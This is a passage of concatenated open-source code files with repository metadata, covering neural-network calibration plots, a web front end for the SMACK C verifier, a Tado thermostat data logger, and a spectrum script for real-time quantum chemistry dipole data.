plt.plot(x, [torch.mean(l) for l in labels['train']], label="Labels")
# plt.plot(x, [1000*mase_loss(predictions[i], labels[i]) for i in range(len(predictions))], label="Loss")
plt.legend()
plt.show()
def show_loss_by_country(predictions, labels, nations, plot=True):
losses = {}
if plot:
# Plot loss by country over time
x = np.arange(0, len(predictions))
plt.title('Loss by Country')
plt.xlabel("Time (days)")
plt.ylabel("MASE Loss")
for i in range(len(nations)):
# Compute MAE loss for each example
loss = [float(mae_loss(predictions[time][i], labels[time][i])) for time in range(len(predictions))]
losses[nations[i]] = loss
if plot:
plt.plot(x, loss, label=nations[i])
if plot:
plt.show()
return losses
def show_labels_by_country(labels, nations):
# Plot labels by country over time
x = np.arange(0, len(labels))
plt.title('New Cases by Country')
plt.xlabel("Time (days)")
plt.ylabel("New COVID Cases")
for i in range(5):
label = [torch.mean(l[i]) for l in labels]
plt.plot(x, label, label=nations[i])
print(nations[i] + ": " + str(int(sum(label)/len(label))))
plt.show()
``` |
{
"source": "jjgarciac/ANN-Calibration",
"score": 3
} |
#### File: jjgarciac/ANN-Calibration/data_viz.py
```python
import tensorflow as tf
import data_loader
import matplotlib.pyplot as plt
from matplotlib.colors import to_rgb, to_rgba
import numpy as np
def scatter(x, y, color, alphas, **kwarg):
#r, g, b = to_rgb(color)
# r, g, b, _ = to_rgba(color)
# Color map I want to use
cm = plt.cm.get_cmap('brg')
# Get the colormap colors for my data
my_cmap = cm(plt.Normalize(color.min(), color.max())(color))
# Set alpha
my_cmap[:, -1] = alphas
# Create new colormap
#my_cmap = ListedColormap(my_cmap)
#color = [(r, g, b, alpha) for alpha in alpha_arr]
plt.scatter(x, y, color=my_cmap, edgecolors='black', **kwarg)
X, Y = data_loader.make_toy_Story(45)
Y_oh = tf.one_hot(Y, len(np.unique(Y)), dtype=tf.float32, off_value=0.0001).numpy()
X_tmp = np.zeros_like(X)
Y_oh_tmp = np.zeros_like(Y_oh)
for i in range(2):
p = np.random.permutation(len(X))
X_tmp = .7*X_tmp + .3*X[p]
Y_oh_tmp = .7*Y_oh_tmp + .3*Y_oh[p]
X = np.concatenate([X, X_tmp], axis=0)
Y_oh = np.concatenate([Y_oh, Y_oh_tmp], axis=0)
#X = np.concatenate([X, X_tmp])
#Y_oh = np.concatenate([Y_oh, Y_oh_tmp])
alpha = 1-(np.sum(np.log(Y_oh)*Y_oh, axis=1)/np.log(.2))
c = np.sum(np.arange(Y_oh.shape[1]+1)[1:]*Y_oh, axis=1)
scatter(X[:, 0], X[:, 1], c, alpha)
plt.show()
```
#### File: ANN-Calibration/model/models.py
```python
import tensorflow as tf
import tensorflow.keras as tfk
from tensorflow.keras.layers import Dense
import math
from metrics import *
def gauss_pdf(x, name=None):
return (1/tf.sqrt(2*math.pi))*tf.math.exp((-tf.pow(x, 2))/2)
def build_model(in_shape, out_shape, manifold_mixup=False):
if manifold_mixup:
model = ManifoldMixup(hidden_layers=[64,64,64,64], output_shape=out_shape)
else:
model = tfk.Sequential([
Dense(128, activation='relu', input_shape=(in_shape,)),
Dense(128, activation='relu'),
Dense(out_shape)
])
optimizer = tfk.optimizers.Adam()
loss = tfk.losses.CategoricalCrossentropy(from_logits=True)
metrics = [ECE_metrics(name='ECE', num_of_bins=10),
OE_metrics(name='OE', num_of_bins=10),
tfk.metrics.CategoricalAccuracy('accuracy', dtype=tf.float32),]
model.compile(optimizer=optimizer,
loss=loss,
metrics=metrics,
run_eagerly=True)
return model
```
#### File: jjgarciac/ANN-Calibration/viz.py
```python
import utils
import data_loader
import tensorflow as tf
import numpy as np
import argparse
import utils
import pandas as pd
import models
import matplotlib.pyplot as plt
import os
from argparse import Namespace
from sklearn.model_selection import train_test_split
def isfloat(x):
try:
a = float(x)
except (TypeError, ValueError):
return False
else:
return True
def isint(x):
try:
a = float(x)
b = int(a)
except (TypeError, ValueError):
return False
else:
return a == b
def get_model_url(model, dataset, id):
return os.path.join('./experiments_buffer', *[model, dataset, id])
def old_load_args(url):
parser = argparse.ArgumentParser()
#parser.add_argument('--a', default=1)
#args = parser.parse_args()
args=None
args_url = os.path.join(url, 'args.txt')
if os.path.exists(args_url):
with open(args_url, 'r') as f:
ns = f.read()
args = parser.parse_args(namespace=eval(ns))
return args
def load_args(url):
parser = argparse.ArgumentParser()
args={}
args_url = os.path.join(url, 'args.txt')
if os.path.exists(args_url):
with open(args_url, 'r') as f:
ns = f.read()
for arg in ns[10:].split(','):
arg = arg.split('=')
arg[1] = arg[1].strip('\'')
arg[1] = arg[1].rstrip(')')
v = arg[1]
if(arg[1]=='True'):
v=True
if(arg[1]=='False'):
v=False
if(isfloat(arg[1])):
v=float(arg[1])
if(isint(arg[1])):
v=int(arg[1])
args[arg[0].strip()]=v
return Namespace(**args)
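# Expected args.txt layout (hypothetical example): a single repr of an argparse
# Namespace, e.g. Namespace(dataset='moon', n_train=1000, norm=True, lr='0.001').
# ns[10:] drops the leading "Namespace(" before the key=value pairs are split on ','.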
def load_data(args):
data = data_loader.load(args.dataset,
n_train=args.n_train,
n_test=args.n_test,
train_noise=args.train_noise,
test_noise=args.test_noise)
stratify = args.dataset not in ["abalone", "segment"]
if args.dataset not in ['arcene', 'moon', 'toy_Story', 'toy_Story_ood', 'segment']:
print(args.dataset)
x = data_loader.prepare_inputs(data['features'])
y = data['labels']
x_train, x_test, y_train, y_test = train_test_split(x,
y,
train_size=args.train_test_ratio,
stratify=y if stratify else None)
else:
if args.dataset == 'moon' or args.dataset=='toy_Story' or \
args.dataset=='toy_Story_ood':
x_train, x_test = data['x_train'], data['x_val']
else:
x_train, x_test = data_loader.prepare_inputs(data['x_train'], data['x_val'])
y_train, y_test = data['y_train'], data['y_val']
# Generate validation split
x_train, x_val, y_train, y_val = train_test_split(x_train,
y_train,
train_size=args.train_test_ratio,
stratify=y_train if stratify else None)
x_train = x_train.astype(np.float32)
x_val = x_val.astype(np.float32)
x_test = x_test.astype(np.float32)
n_mean = np.mean(x_train, axis=0)
n_std = np.var(x_train, axis=0)**.5
x_train = (x_train-n_mean)/n_std
x_val = (x_val-n_mean)/n_std
x_test = (x_test-n_mean)/n_std
try:
if args.n_ood>0 and y_val.shape[1]>args.n_ood:
n_ood = y_val.shape[1]-args.n_ood-1
return utils.prepare_ood(x_train, x_val, x_test, y_train, y_val, y_test, n_ood, args.norm)
except AttributeError:
#print(x_train, x_val, x_test, y_train, y_val, y_test)
return x_train, x_val, x_test, y_train, y_val, y_test, 0, 0
return x_train, x_val, x_test, y_train, y_val, y_test, 0, 0
def load_model(url, in_shape, out_shape, args):
checkpoint_filepath = os.path.join(url, 'ckpt')
model = models.build_model(in_shape, out_shape, args.model, args)
model.load_weights(checkpoint_filepath)
return model
def leave_cvx_hull(model_list, x, y):
fig, axs = plt.subplots(1, 3)
fig.suptitle('Leaving cvx hull')
for i, y_lbl in enumerate(['accuracy', 'confidence', 'entropy']):
for model in model_list:
y_list = []
for u in range(0, 100):
y_plot=0
t = np.random.uniform(size=x.shape)
py_x = tf.nn.softmax(model(x + u*t))
if y_lbl=='entropy':
y_plot = -tf.reduce_mean(tf.reduce_sum(py_x*tf.math.log(py_x), axis=1))
if y_lbl=='accuracy':
y_plot = tf.reduce_mean(tf.cast(
tf.argmax(py_x, axis=1)==tf.argmax(y, axis=1), tf.float32))
if y_lbl=='confidence':
y_plot = tf.reduce_mean(tf.reduce_max(py_x, 1))
y_list.append(y_plot.numpy())
axs[i].plot(np.array(y_list), label=model.name)
axs[i].set(xlabel='perturbation', ylabel=y_lbl+' (mean)')
axs[i].legend()
def confidence_plot(model, x, xo):
    p_in = tf.reduce_max(tf.nn.softmax(model(x)), axis=1)
    p_out = tf.reduce_max(tf.nn.softmax(model(xo)), axis=1)
plt.ylabel('Frequency')
plt.xlabel('Confidence')
plt.xlim([0, 1])
plt.hist(p_in, bins=20, color='blue', label='In', alpha=.5)
plt.hist(p_out, bins=20, color='red', label='Out', alpha=.5)
plt.legend()
return 0
def calibration_plot(model, x, y, ece):
py_x = tf.nn.softmax(model(x))
    p = tf.reduce_max(py_x, axis=1)
hat_y = tf.argmax(py_x, axis=1)
y = tf.argmax(y, axis=1)
acc = tf.cast(hat_y==y, tf.float32)
idx = tf.argsort(p)
    p = tf.gather(p, idx)
    acc = tf.gather(acc, idx)
plt.title(f'Calibration {model.name}: {ece}')
plt.ylabel('Frequency')
plt.xlabel('ACC/Conf')
plt.xlim([0, 1])
plt.hist(acc, bins=20, color='blue', label='accuracy', alpha=.5)
plt.hist(p, bins=20, color='red', label='confidence', alpha=.5)
plt.legend()
return 0
def analyze_features(model, x, xo, idx):
plt.hist(x[:, idx], bins=20, color='blue', label='sample', alpha=.5)
plt.hist(xo[:, idx], bins=20, color='red', label='ood', alpha=.5)
if model.name in ['jemo', 'jehmo']:
xgo = model.sample_ood(x)
plt.hist(xgo[:, idx], bins=20, color='green', label='gen_o', alpha=.5)
plt.legend()
return 0
``` |
{
"source": "jjgarzella/smack",
"score": 3
} |
#### File: smack/rise4fun/smack_server.py
```python
import BaseHTTPServer
import SimpleHTTPServer
import json
import subprocess
import os, time, re
import random
PORT = 8080
version = "1.4.4"
rise_simple = """#include "smack.h"
//__VERIFIER_nondet() : Is used to permit assigned memory to have unconstrained values
//assume(): Is used to enforce constraints on specified regions of memory
//assert(): Is used to prove some assertions on values in the program. Assertions may contain unconstrained values.
int main() {
int x = __VERIFIER_nondet();
int n = __VERIFIER_nondet();
assume(n>0);
assert(x+n > x);
return 0;
}"""
rise_simple_buggy = """#include "smack.h"
//__VERIFIER_nondet() : Is used to permit assigned memory to have unconstrained values
//assume(): Is used to enforce constraints on specified regions of memory
//assert(): Is used to prove some assertions on values in the program. Assertions may contain unconstrained values
int main() {
int x = __VERIFIER_nondet();
int n = __VERIFIER_nondet();
assume(n>=0);
assert(x+n > x);
return 0;
}"""
func_ptr_fail ="""#include "smack.h"
//As demonstrated here, we can prove the correctness of functions for the entire range of input values
int incr(int x) {
return ++x;
}
int decr(int x) {
return --x;
}
int main(void) {
int (*fp)(int);
int x = __VERIFIER_nondet(), y = __VERIFIER_nondet(), old_x = x;
if (y > 0) {
fp = incr;
} else {
fp = decr;
}
x = fp(x);
assert(x == old_x-1 || x == old_x+1);
return 0;
}"""
loop = """#include "smack.h"
//By specifying a sufficient loop unroll factor, we can reason about loops.
//Specify the loop unroll factor here with the syntax @LU:<unroll count>@ E.g: @LU:8@
void initDescArray(int number[], int size)
{
int i;
for(i=size-1;i>=0;i--)
number[i]=i;
}
int main()
{
int num[6], size = 6;
int i = __VERIFIER_nondet();
initDescArray(num,size);
if(i >= 1 && i < 6)
assert(num[i] > num[i-1]);
}"""
complicated_function = """#include "smack.h"
//We can prove properties of return values of procedures for all possible input parameters
int foo(int x, int y) {
int a;
if (x < y) {
a = 3;
} else if (x > y) {
a = 2;
} else {
a = 1;
}
a++;
if (a > 2) {
a--;
if (x < 0) {
a++; x++;
} else {
a--; x--;
}
} else {
if (y < 0) {
a--; y--;
} else {
a++; y++;
}
}
if (x == a && y == a) {
a--;
}
return a;
}
int main(void) {
int b;
b = foo(__VERIFIER_nondet(), __VERIFIER_nondet());
assert(b != 0);
return 0;
}"""
limit_multiply="""#include "smack.h"
//Though support by the theorem prover is limited for multiplication, we can solve some equations
int main(void) {
int x, y, z, a, b;
x = 4;
y = 3;
z = 19;
a = __VERIFIER_nondet();
b = __VERIFIER_nondet();
if(a>=0 && b>=0)
assert(z != (a*x+b*y));
return 0;
}"""
structcast = """#include <stdio.h>
#include <stdlib.h>
#include "smack.h"
//Memory is modeled to match the C specification
typedef struct {
int a;
int b;
} S1;
typedef struct {
int x;
} S2;
int main(void) {
S1 s1;
S2* p2 = (S2*)(&s1);
s1.a = 3;
p2->x = 4;
assert(s1.a == 4);
return 0;
}"""
tutorialsource = """SMACK is a SMACK is a tool for statically checking properties of programs written in C/C++.
For a given input program, SMACK checks for violations of user-provided assertions.
The tool is open-source and integrates into the well-known LLVM compiler infrastructure.\r\n
There are 3 types of annotations that SMACK allows the user to specify. They are the assert, assume and nondet statements.\r\n
Assert: Allows the user to specify a predicate on the variables in scope. SMACK statically checks the assertion at this
program location. The predicate P can be specified in an assert with the syntax assert(P) \r\n
Assume: Allows the user to specify the assumptions of the program from the point of specification onward. If the
assumption is denoted by A, assume(A) is the syntax for specifying it. E.g.: assume(n > 0)
Nondet: Allows the user to specify a "random" value. This is specified by __VERIFIER_nondet(). The statement returns a
nondeterministic type-safe value."""
metadata = {
"Name": "smack",
"DisplayName": "SMACK",
"Version": version,
"Email": "<EMAIL>",
"SupportEmail": "<EMAIL>",
"TermsOfUseUrl": "https://github.com/smackers/smack/",
"PrivacyUrl": "https://github.com/smackers/smack/",
"Institution": "University of Utah",
"InstitutionUrl": "https://github.com/smackers/smack/",
"InstitutionImageUrl": "https://dl.dropboxusercontent.com/u/93242277/smack-logo.png",
"MimeType": "text/x-c",
"SupportsLanguageSyntax": True,
"Title": "Verifier for C/C++ Programs",
"Description": "At its core, SMACK is a translator from the LLVM compiler's popular intermediate representation (IR) into the Boogie intermediate verification language (IVL). Sourcing LLVM IR exploits an increasing number of compiler frontends, optimizations, and analyses. Targeting Boogie exploits a canonical platform which simplifies the implementation of algorithms for verification, model checking, and abstract interpretation. The main purpose of SMACK is to decouple the implementations of verification algorithms from the details of source languages, and enable rapid prototyping on production code.",
"Question": "Are there any assertion violations in this program?",
"Url": "https://github.com/smackers/smack/",
"Samples": [
{
"Name": "simple proof",
"Source": rise_simple
},
{
"Name": "simple buggy example",
"Source": rise_simple_buggy
},
{
"Name": "function pointers",
"Source": func_ptr_fail
},
{
"Name": "loops and arrays",
"Source": loop
},
{
"Name": "procedure summaries",
"Source": complicated_function
},
{
"Name": "solving equations",
"Source": limit_multiply
},
{
"Name": "structures",
"Source": structcast
}
]
}
class TestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
try:
if self.path.startswith("/metadata"):
body = json.dumps(metadata)
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Content-Length', len(body))
self.send_header('Expires', '-1')
self.send_header('Cache-Control', 'no-cache')
self.send_header('Cache-Control', 'no-store')
self.send_header('Cache-Control', 'must-revalidate')
self.send_header('Cache-Control', 'max-age=0')
self.send_header('Pragma', 'no-cache')
self.end_headers()
self.wfile.write(body)
self.wfile.flush()
self.connection.shutdown(1)
return
if self.path.endswith("language"):
return
return
except IOError:
print 'IOError'
self.send_error(404,'File Not Found: %s' % self.path)
def do_POST(self):
length = int(self.headers.getheader('content-length'))
data_string = self.rfile.read(length)
data = json.loads(data_string)
f = open("rollingcount",'r')
x = int(f.read())+1
filename = 'input_'+str(x)
f.close()
f = open("rollingcount",'w')
f.write(str(x))
f.close()
f = open(filename+'.c', 'w')
f.write(data["Source"])
f.close()
regulex = re.match(r".*@LU:(?P<lu>\d+)@.*", data["Source"],re.DOTALL)
if(regulex):
lucount = regulex.groupdict()["lu"]
else:
lucount = '2'
f = open('logs','a')
p = subprocess.Popen(["timeout","10s",'smackverify.py', '--unroll', lucount, filename + '.c', '-o', filename +'.bpl'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
smack_string = p.communicate()
return_code = p.returncode
if not return_code == 0:
if return_code == 124:
resp = "Program is taking unusually long to verify. Request timed out."
smack_response = {
"Version": version,
"Outputs": [
{
"MimeType": "text/plain",
"Value": resp
}
]
}
f.write(self.client_address[0]+"--"+filename+".c--"+"Timed Out\n")
f.close()
else:
output = smack_string[0].replace(filename+'.c', 'input.c')
output = output.split(' ')
error = []
smack = ''
for i in range(len(output)):
if(output[i] == "error:" or output[i] == "warning:"):
error.append(i)
for i in range(len(error)):
t = output[error[i]-1].split(':')
flag =1
if(output[error[i]-1] == 'fatal'):
flag = 0
if(i < len(error)-1 and flag):
m = output[error[i]].split(':')
j = error[i]+1
while 1:
if('\n' in output[j]):
break
j = j+1
haha = output[j].find('\n')
output[j] = output[j][0:haha]
p = output[error[i]+1:j+1]
we = " "
p = we.join(p)
if(len(t) < 3 or len(m) < 1):
smack = smack+" SMACK Error\r\n"
else:
smack = smack+"input.c("+t[1]+","+t[2]+") : "+m[0]+" "+str(i)+": "+p+"\r\n"
elif(i == len(error)-1 and flag):
m = output[error[i]].split(':')
j = error[i]+1
while 1:
if('\n' in output[j]):
break
j = j+ 1
haha = output[j].find('\n')
output[j] = output[j][0:haha]
p = output[error[i]+1:j+1]
we = " "
p = we.join(p)
if(len(t) >= 3 or len(m) >= 1):
smack = smack+"input.c("+t[1]+","+t[2]+") : "+m[0]+" "+str(i)+": "+p+"\r\n"
else:
smack = smack+" SMACK Error\r\n"
if(smack == ''):
smack = "SMACK Error"
smack_response = {
"Version": version,
"Outputs": [
{
"MimeType": "text/plain",
"Value": smack
}
]
}
f.write(self.client_address[0]+"--"+filename+".c--"+"SMACK Error\n")
f.close()
else:
outp = smack_string[0].replace(filename+'.c', 'input.c')
output = outp.split(' ')
output = [i for i in output if '$' not in i]
for i in range(len(output)):
if '):' in output[i]:
output[i]=output[i][0:len(output[i])-1]+"\n"
t=" "
smack = t.join(output)
g = open(filename+".output",'w')
g.write(smack)
g.close()
f.write(self.client_address[0]+"--"+filename+".c--"+"Output\n")
f.close()
if('not hold' in outp):
temp = smack.split('\n')
temp = [w for w in temp if w != '']
response = temp[0]+"\r\n"
flag = 1
cnt = 0
for i in range(len(temp)):
if('input' in temp[i] and flag):
response = response+temp[i]+" : error main: This assertion might not hold\r\n"
flag = 0
elif('input' in temp[i] and flag == 0):
response = response+temp[i]+" : Trace Element: Error trace["+str(cnt)+"]\r\n"
cnt = cnt +1
response = response + temp[len(temp)-1]
smack_response = {
"Version": version,
"Outputs": [
{
"MimeType": "text/plain",
"Value": response
}
]
}
else:
smack_response = {
"Version": version,
"Outputs": [
{
"MimeType": "text/plain",
"Value": smack
}
]
}
f.close()
body = json.dumps(smack_response)
self.send_response(200)
self.send_header('Content-Type', 'text/javascript')
self.send_header('Content-Length', len(body))
self.send_header('Expires', '-1')
self.send_header('Cache-Control', 'no-cache')
self.send_header('Cache-Control', 'no-store')
self.send_header('Cache-Control', 'must-revalidate')
self.send_header('Cache-Control', 'max-age=0')
self.send_header('Pragma', 'no-cache')
self.end_headers()
self.wfile.write(body)
self.wfile.flush()
os.system("rm "+filename+".b*")
self.connection.shutdown(1)
return
def start_server():
server_address = ("", PORT)
server = BaseHTTPServer.HTTPServer(server_address, TestHandler)
server.serve_forever()
if __name__ == "__main__":
start_server()
``` |
{
"source": "jjgibson/PyTadoLog",
"score": 2
} |
#### File: PyTadoLog/pytadolog/datalogger.py
```python
import concurrent.futures
import getpass
import json
import logging
import multiprocessing
import pathlib
import sched
import time
from urllib.error import HTTPError, URLError
import keyring
import numpy as np
from .datastores import DataStore, MPDataStore
from .extended_interface import TadoExtended
from .utils import nexttick, loglistener, setuplogger, setupoutdir
_LOGGER = logging.getLogger(__name__)
class TadoLogger:
"""Periodically requests TaDo data and passes to dataframe."""
CREDPATH = pathlib.Path.home() / ".tado_credentials"
def __init__(
self,
outdir=None,
update_period=30,
last_day="sun",
multiproc=True,
loglevel=logging.WARNING,
):
"""Constructs TaDo logger to update at update_periods.
Args:
outdir (path like, optional): Output direct to store csvs and logs.
Defaults to None which places files in <home>/Documents/TadoLogs/.
update_period (int, optional): Time in seconds between update.
Defaults to 30.
last_day (str, optional): Three letter weekday string indicating
last day of week stored in csv files. Defaults to 'sun'.
multiproc (bool, optional): Run datastore in another process.
Defaults to True.
loglevel (logging level, optional): Level to log at. Defaults to
logging.WARNING.
"""
self.update_period = update_period
self.lastday = last_day
self._multiproc = multiproc
self._loglevel = loglevel
self._outdir = setupoutdir(outdir)
self.event = None # Will hold next update event
self.scheduler = sched.scheduler(time.time, time.sleep)
self._logqueue = multiprocessing.Queue(-1)
self._stopev = multiprocessing.Event()
self._loglistener = multiprocessing.Process(
target=loglistener,
args=(self._outdir, self._logqueue, self._stopev, self._loglevel),
)
self._loglistener.start()
setuplogger(_LOGGER, self._logqueue, self._loglevel)
_LOGGER.info("---STARTED TADOLOGGER---")
self.variables = {
"Weather": ("Outside Temp (°C)", "Solar Int. (%)", "Weather"),
"Zones": (
"Temp (°C)",
"R.H. (%)",
"Set Temp (°C)",
"Heating Power (%)",
"Open Window",
),
}
_LOGGER.info("Logging into TaDo server")
self.login()
self.zones = sorted(self.home.getZones(), key=lambda z: z["id"])
_LOGGER.debug("Found %s zones in home", len(self.zones))
if self._multiproc:
self._q = multiprocessing.JoinableQueue()
self.pdstore = MPDataStore(
self.variables,
self.zones,
self._outdir,
self.update_period,
self.lastday,
self._logqueue,
self._loglevel,
self._q,
self._stopev,
)
else:
self.pdstore = DataStore(
self.variables,
self.zones,
self._outdir,
self.update_period,
self.lastday,
self._logqueue,
self._loglevel,
)
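    # Example construction (illustrative only; argument values are arbitrary):
    #   tl = TadoLogger(update_period=60, last_day='sat', multiproc=False)
    # With multiproc=True (the default) the datastore runs in its own process and is fed
    # through the JoinableQueue created above; otherwise updates are applied in-process.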
def __enter__(self):
_LOGGER.debug("PyTadoLog context manager entered")
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
_LOGGER.debug("PyTadoLog context manager exiting")
if exc_type is not None:
_LOGGER.exception(
"Error encountered during operation",
exc_info=(exc_type, exc_value, exc_traceback),
)
self.close()
def login(self):
"""Log in to TaDo mobile server.
Check if credentials are stored using default OS credentials manager
and prompts for new credentials if required.
"""
if not self.CREDPATH.exists():
_LOGGER.error(
"Credentials file cannot be found - Enter Tado credentials",
)
self.setcredentials()
loggedin = False
while not loggedin:
try:
with open(self.CREDPATH, mode="r") as f:
credentials = json.load(f)
except json.decoder.JSONDecodeError:
_LOGGER.error(
"Credentials file is corrupted - reenter Tado credentials",
)
self.setcredentials()
else:
try:
self.home = TadoExtended(
credentials["username"],
keyring.get_password(
credentials["service"], credentials["username"]
),
)
except HTTPError:
_LOGGER.error(
"Tado username or password is incorrect - reenter credentials",
)
self.setcredentials()
else:
loggedin = True
_LOGGER.debug("Logged into TaDo server")
def setcredentials(self, service="tado"):
"""Prompt user to enter TaDo login credentials.
Args:
service (str, optional): Name of TaDo service in default OS
credentials manager. Defaults to 'tado'.
Stores the service name and username in self.CREDPATH.
"""
_LOGGER.debug("Requesting TaDo username from user")
username = str(input("Enter Tado username: "))
with open(self.CREDPATH, "w") as f:
_LOGGER.debug("Saving TaDo credentials details to %s", self.CREDPATH)
json.dump({"service": service, "username": username}, f)
keyring.set_password(service, username, getpass.getpass())
_LOGGER.debug("TaDo credentials stored in OS credentials manager")
def update(self, t):
"""Get new data and append to dataframe then schedule next update.
Args:
t (datetime.datetime): Scheduled time of current update.
"""
if self._multiproc:
self._q.put((t, self.getnewdata()))
else:
self.pdstore.update(t, self.getnewdata())
# Schedule the next update
start_time = nexttick(self.update_period)
_LOGGER.debug("Update scheduled for %s", start_time)
print(f"Next update scheduled for {start_time}", end="\r", flush=True)
self.event = self.scheduler.enterabs(
time.mktime(start_time.timetuple()),
1,
self.update,
argument=(start_time,),
)
def getnewdata(self):
"""Get latest data from TaDo server and add to dataframe.
        Uses a multithreaded pool to get data simultaneously.
"""
with concurrent.futures.ThreadPoolExecutor(
max_workers=len(self.zones) + 1
) as executor:
# Load the operations then wait for them all to complete
futures = [executor.submit(self.getweatherdata)]
futures.extend(
[executor.submit(self.getzonedata, zone) for zone in self.zones]
)
futures, _ = concurrent.futures.wait(futures, timeout=30)
return [future.result() for future in futures]
def getzonedata(self, zone):
"""Get data on requested zone from TaDo server.
Args:
zone (int): ID for TaDo Zone.
Returns:
tuple: Tuple containing Zone data.
Uses try/except clauses to handle server downtime.
"""
try:
climate = self.home.getClimate(zone["id"])
except (URLError, TypeError):
# If the server doesn't respond continue running
# TypeError is raised if there is no response
_LOGGER.warning("Could not get climate for %s", zone["name"])
climate = {"temperature": np.nan, "humidity": np.nan}
try:
state = self.home.getHeatingState(zone["id"])
except (URLError, TypeError):
# If the server doesn't respond continue running
_LOGGER.warning("Could not get heating state for %s", zone["name"])
state = {"temperature": np.nan, "power": np.nan}
try:
window = self.home.getOpenWindow(zone["id"])
except (URLError, TypeError):
# If the server doesn't respond continue running
_LOGGER.warning("Could not get window state for %s", zone["name"])
window = np.nan
_LOGGER.debug("Got all data for %s", zone["name"])
out = (
zone["name"],
(
climate["temperature"],
climate["humidity"],
state["temperature"],
state["power"],
window,
),
)
return ("Zones", out)
def getweatherdata(self):
"""Get weather data from TaDo server.
Returns:
tuple: TaDo weather data.
Uses try/except clauses to handle server downtime.
"""
try:
data = self.home.getWeather()
dataout = (
data["outsideTemperature"]["celsius"],
data["solarIntensity"]["percentage"],
data["weatherState"]["value"],
)
except (URLError, TypeError):
# If the server doesn't respond continue running
# TypeError is raised if there is no response
_LOGGER.debug("Could not get weather data")
dataout = (np.nan, np.nan, np.nan)
out = ("Weather", dataout)
return ("Weather", out)
def start(self):
"""Start running the data logger.
Sets up the dataframe and schedules the first update.
"""
start_time = nexttick(self.update_period)
self.event = self.scheduler.enterabs(
time.mktime(start_time.timetuple()),
1,
self.update,
argument=(start_time,),
)
_LOGGER.info("First data point scheduled for %s", start_time)
if self._multiproc:
self.pdstore.start()
self.scheduler.run()
def close(self):
"""Clean up any scheduled events."""
if self.scheduler is not None:
if not self.scheduler.empty():
_LOGGER.debug("Cancelling scheduled event")
self.scheduler.cancel(self.event)
if self._multiproc:
self._stopev.set()
_LOGGER.debug("Set stop event")
self._q.join()
_LOGGER.debug("Datastore process stopped")
if __name__ == "__main__":
import datetime as dt
with TadoLogger() as tl:
tl.start()
print(f"Logging ended at {dt.datetime.now()}")
```
#### File: PyTadoLog/pytadolog/extended_interface.py
```python
from PyTado.interface import Tado
class TadoExtended(Tado):
"""Extends the PyTado interface to provide additional methods."""
def getHeatingState(self, zone):
"""Gets set temperature (centigrade) and heating power (%) for Zone zone."""
data = self.getState(zone)
return {
"temperature": data["setting"]["temperature"]["celsius"],
"power": data["activityDataPoints"]["heatingPower"]["percentage"],
}
def getOpenWindow(self, zone):
"""Gets open window status for Zone zone."""
if self.getState(zone)["openWindow"] is None:
return False
else:
return True
``` |
{
"source": "jj-github93/Mind-Reader",
"score": 4
} |
#### File: jj-github93/Mind-Reader/mind_reader_WIP.py
```python
import random
names = ["1","2","3","4","5","6","7","8","9","10","J","Q","K"]
suits = ["Spades","Hearts","Clubs","Diamonds"]
def createADeck():
deck = []
for s in suits:
for v in names:
deck.append((v,"of",s))
return deck
deck = createADeck()
random.shuffle(deck)
initialFour = random.sample(deck, 4)
print(initialFour)
memory = input("Memorise a Card from the given options and I will make it disappear! \nPress the enter key when you are ready! ")
random.shuffle(initialFour)
oldThree = initialFour[0:3]
newCard = random.sample(deck, 1)
newHand = oldThree + newCard
random.shuffle(newHand)
print(newHand)
mindFreak = input("Did I manage to remove the card you were thinking of?(y or n): ")
if mindFreak == "y":
print("I am the best Mind-Reader!!!")
else:
print("I will try again :(")
``` |
{
"source": "jjgoings/cq_realtime",
"score": 3
} |
#### File: jjgoings/cq_realtime/cq_realtime.py
```python
from __future__ import division
import sys
import numpy as np
import matplotlib.pyplot as plt
from scipy.fftpack import fft, fftfreq
from cs import CS
def cqRealTime(real_time_file,dipole_direction,kick_strength,damp_const,cs=False):
'''
(C) <NAME> 2016
CQ_RealTime.py: a post-processing script for computing the absorption spectrum of
Real Time Time Dependent SCF jobs in Chronus Quantum
Computes the energy range, w (in eV) and dipole strength function S(w) for
a given real time TD-SCF run.
real_time_file ... type:string ; the RealTime_Dipole.csv file from a ChronusQ run
dipole_direction ... type:char ; which dipole moment contribution is computed (e.g. 'x','y', or 'z')
kick_strength ... type:float ; in a.u., what was the applied field strength (e.g. 0.0001 au)
damp_const ... type:float ; in a.u. of time, gives FWHM of 1/damp_const
cs ... type:boolean; if True, do compressed sensing instead of Fourier Transform
'''
# chronusq file is CSV, also skip the header (first row)
rt = np.genfromtxt(real_time_file,skip_header=1,delimiter=',')
length = len(rt)
if cs == True:
# Reduce sample size
        print("Reducing time sample size to 1000")
if length > 1000:
length = 1000
# print warning if you override the defaults
if length > 1000:
        print("Time series too long! CS will take FOREVER.")
        print("Reduce the size of your time series.")
# choose which dipole axis you want
if dipole_direction.lower() == 'x':
direction = 2
elif dipole_direction.lower() == 'y':
direction = 3
elif dipole_direction.lower() == 'z':
direction = 4
else:
        print("Not a valid direction for the dipole! Try: x,y,z ")
sys.exit(0)
t = rt[:int(length),0]
# note 'z' is just generic dipole direction, converted from debye to au
z = rt[:int(length),direction]*0.393456
# scale dipole signal
z0 = z[0]
z = z - z0
    # add damping to give Lorentzian lineshape with FWHM of (2/damp_const)
damp = np.exp(-(t-t[0])/damp_const)
z = z * damp
# pad signal with zeros. also not necessary, but makes spectra prettier
#zero = np.linspace(0,0,10000)
#z = np.hstack((z,zero))
if cs == True:
# do compressed sensing
try:
import cs
        except ImportError:
cs = False
fw_im = CS(z)
if cs == False:
# do fourier transform instead
fw = fft(z)
fw_re = np.real(fw) # the real FFT frequencies
fw_im = (np.imag(fw)) # the imaginary FFT frequencies
fw_abs = abs(fw) # absolute value of frequencies
# determine frequency range
n = len(fw_im) # number samples, including padding
timestep = t[1] - t[0] # spacing between time samples; assumes constant time step
w = fftfreq(n,d=timestep)*2.0*np.pi # frequency list
# 'correct' equation for dipole strength function assuming you did SCF in static field
#S = (2.0*w*w*fw_re)/(3.0*np.pi*137*kick_strength)
# 'correct' equation for dipole strength function assuming you did a delta kick
S = -(4.0*w*np.pi*fw_im)/(3.0*137*kick_strength)
# you can print the integrated dipole strength function ... should equal number of electrons
#from scipy.integrate import simps
#idx = np.where((w >= 0.0) & (w <=10000.0))
#integral = simps(S[idx],w[idx])
w = (w*27.2114) # give frequencies in eV
return w, S
if __name__ == '__main__':
